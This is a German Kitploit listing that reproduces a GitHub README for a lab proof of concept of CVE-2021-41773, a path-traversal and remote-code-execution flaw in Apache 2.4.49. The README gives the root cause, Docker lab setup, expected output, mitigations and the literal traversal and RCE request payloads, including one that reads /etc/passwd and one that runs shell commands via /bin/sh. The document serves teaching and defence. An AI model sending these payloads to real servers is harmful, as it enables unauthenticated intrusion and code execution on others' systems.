Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773- — Eine umfassende Analyse von CVE-2021-41773 (Apache HTTP Server 2.4.49), mit Schwachstellenforschung, kontrollierter laborbasierter Exploitation, Proof-of-Concept-Entwicklung, Ursachenanalyse und Minderungsstrategien für Bildungs- und defensive Sicherheitszwecke. | Kitploit
Tools/GitHubGitHub/abds059/apache-path-traversal-rce-cve-2021-41773-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubabds059/apache-path-traversal-rce-cve-2021-41773-

APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773-

Eine umfassende Analyse von CVE-2021-41773 (Apache HTTP Server 2.4.49), mit Schwachstellenforschung, kontrollierter laborbasierter Exploitation, Proof-of-Concept-Entwicklung, Ursachenanalyse und Minderungsstrategien für Bildungs- und defensive Sicherheitszwecke.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5 MonatenNoch nicht geprüft

CVE-2021-41773 — Apache HTTP Server 2.4.49 Path Traversal / RCE

Apache CVE CVSS Python Docker Lab Only

Forschungsprojekt zu Bildungszwecken. Alle Tests wurden in einem isolierten Docker-Lab durchgeführt. Nicht gegen Systeme verwenden, die dir nicht gehören.


Zusammenfassung der Schwachstelle

FeldDetails
CVE IDCVE-2021-41773
Betroffene SoftwareNur Apache HTTP Server 2.4.49
SchwachstellentypPfad-Traversal → Remote Code Execution
CVSS-Wert9.8 (Kritisch)
OffengelegtOktober 2021
Behoben inApache 2.4.51

Grundursache

Apache 2.4.49 kann URL-kodierte Pfadsequenzen (%2e%2e) nicht korrekt normalisieren, bevor Zugriffssteuerungsregeln angewendet werden. Dies ermöglicht einem Angreifer, den Web-Root zu verlassen. Wenn CGI aktiviert ist, führt das Richten des Traversals auf /bin/sh und das Senden von Shell-Befehlen im POST-Body zu einer nicht authentifizierten Remote Code Execution.


Repository-Inhalt

root@kitploit:~
cve-2021-41773-poc/
├── Dockerfile      # Absichtlich anfälliger Apache 2.4.49 Laborcontainer
├── exploit.py      # Python PoC – verwendet Raw-Sockets, um %2e-Kodierung zu erhalten
├── SETUP.md        # Schritt-für-Schritt-Anleitung zum Lab-Setup
├── README.md       # Diese Datei
└── report.pdf      # Vollständiger Exploit-Entwicklungsbericht

Schnellstart

1. Erstellen und Ausführen des anfälligen Containers

root@kitploit:~
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449

2. Ausführen des Exploits

root@kitploit:~
python3 exploit.py

3. Erwartete Ausgabe

root@kitploit:~
==================================================
 CVE-2021-41773 PoC — Lab Use Only
==================================================
[+] Target reachable — HTTP 200

[*] Path Traversal — Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) — server restrictions in place

[*] RCE — Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[*] RCE — Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon

[*] RCE — Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7

Siehe SETUP.md für vollständige Setup-Anleitung und Fehlerbehebung.


Wie der Exploit funktioniert

Die requests-Bibliothek normalisiert %2e → . vor dem Senden, was den Exploit zerstört (gibt 400 zurück). Dieser PoC verwendet Raw-Sockets, um die HTTP-Anfrage Byte für Byte zu senden, wobei die kodierte Traversal-Sequenz genau so erhalten bleibt, wie Apache 2.4.49 sie empfangen muss.

Traversal-Payload:

root@kitploit:~
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1

RCE-Payload:

root@kitploit:~
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id

Apache dekodiert %2e%2e vor ACL-Überprüfungen nicht, verarbeitet die Anfrage, leitet sie durch CGI und führt den POST-Body als Shell-Befehl aus.


Gegenmaßnahmen

  • Upgrade auf Apache 2.4.51 oder höher
  • CGI deaktivieren, sofern nicht unbedingt erforderlich
  • Nie Require all granted auf / verwenden
  • Sicherheitspatches nach Veröffentlichung umgehend anwenden

Referenzen

  • CVE-2021-41773 — MITRE
  • Apache Security Advisory
  • ExploitDB #50383
  • Rapid7 Analysis
  • PayloadsAllTheThings

Autor

Abdur Rehman Siddiqui
Exploit-Entwicklung – Aufgabe 3


Dieses Repository dient ausschließlich Lehrzwecken. Der Autor übernimmt keine Verantwortung für Missbrauch dieses Materials.

Tool herunterladen